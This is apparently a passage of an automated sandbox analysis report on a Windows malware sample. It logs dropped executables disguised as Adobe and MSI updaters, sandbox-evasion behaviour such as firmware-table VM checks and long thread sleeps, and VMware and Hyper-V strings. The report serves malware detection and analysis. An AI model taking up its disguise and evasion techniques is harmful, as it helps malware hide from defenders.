Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	System information queried: FirmwareTableInformation

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory allocated: 1350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: 2D60000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: 3060000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: 5060000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: FD0000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: 2BE0000 memory reserve \| memory write watch
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: 2B30000 memory reserve \| memory write watch
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Memory allocated: A90000 memory reserve \| memory write watch
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Memory allocated: 2710000 memory reserve \| memory write watch
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Memory allocated: D90000 memory reserve \| memory write watch
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Memory allocated: 22E0000 memory reserve \| memory write watch
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Memory allocated: 2560000 memory reserve \| memory write watch
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Memory allocated: 22E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory allocated: CE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory allocated: 2710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory allocated: CE0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Window / User API: threadDelayed 405	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Window / User API: threadDelayed 363
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 406

Source: C:\Users\user\Desktop\OJa1BOigU3.exe TID: 3704	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe TID: 3704	Thread sleep count: 90 > 30	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe TID: 3704	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe TID: 4500	Thread sleep count: 405 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe TID: 4500	Thread sleep time: -40905s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe TID: 4500	Thread sleep count: 120 > 30	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe TID: 3164	Thread sleep count: 120 > 30	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe TID: 3164	Thread sleep count: 272 > 30	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe TID: 3164	Thread sleep count: 61 > 30	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe TID: 4520	Thread sleep count: 264 > 30	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe TID: 4520	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe TID: 2520	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5436	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe TID: 4632	Thread sleep count: 363 > 30
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe TID: 4632	Thread sleep time: -36663s >= -30000s
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe TID: 4632	Thread sleep count: 56 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2200	Thread sleep count: 406 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2200	Thread sleep time: -41006s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2200	Thread sleep count: 127 > 30
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe TID: 2196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe TID: 1016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\MPGPH1\MPGPH1.exe TID: 6100	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\MPGPH1\MPGPH1.exe TID: 4944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2304	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2080	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6184	Thread sleep count: 309 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6184	Thread sleep time: -31209s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6184	Thread sleep count: 59 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6272	Thread sleep count: 314 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6272	Thread sleep time: -31714s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6272	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe TID: 6856	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Last function: Thread delayed
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Last function: Thread delayed
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003AE66D FindFirstFileExW,FindNextFileW,FindClose,FindClose,		22_2_003AE66D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0012E66D FindFirstFileExW,FindNextFileW,FindClose,FindClose,		23_2_0012E66D

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSIUpdaterV1.exe_f9eb3d1e2eda166485f639133f6bde09db46edb_bdfd7a68_899606cd-84e4-4b77-a8a7-4c234ca106ec\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_v6ggwc2fJXXgIu5f_1887f2cf649886fae0c2ea234d3f8ef03762663d_678a9ce0_5061925a-09f5-43b8-b876-e8a14283e34c\

Source: Amcache.hve.29.dr	Binary or memory string: VMware
Source: RegAsm.exe, 0000002A.00000002.3509011004.000000000124B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: RegAsm.exe, 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWm
Source: Amcache.hve.29.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSIUpdaterV1.exe, 00000009.00000003.2566360115.0000000001682000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}:
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp, OJa1BOigU3.exe, 00000000.00000002.2346129634.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D5F000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 00000009.00000002.3506110613.000000000166A000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3505760819.000000000173D000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV1.exe, 0000000A.00000002.3505760819.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2647878541.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3505470905.000000000132D000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001361000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000019.00000002.3510229323.0000000000EFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}6
Source: AdobeUpdaterV1.exe, 00000018.00000003.2428533823.0000000001340000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.29.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 0000002C.00000002.3509342638.0000000001500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001490000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&`.=
Source: RegAsm.exe, 00000029.00000002.2784153638.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWuw
Source: Amcache.hve.29.dr	Binary or memory string: vmci.sys
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.00000000014FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}V.=
Source: 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000003.2395383877.0000000001D32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}]
Source: Amcache.hve.29.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.29.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.29.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.29.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.29.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.29.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.29.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.29.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
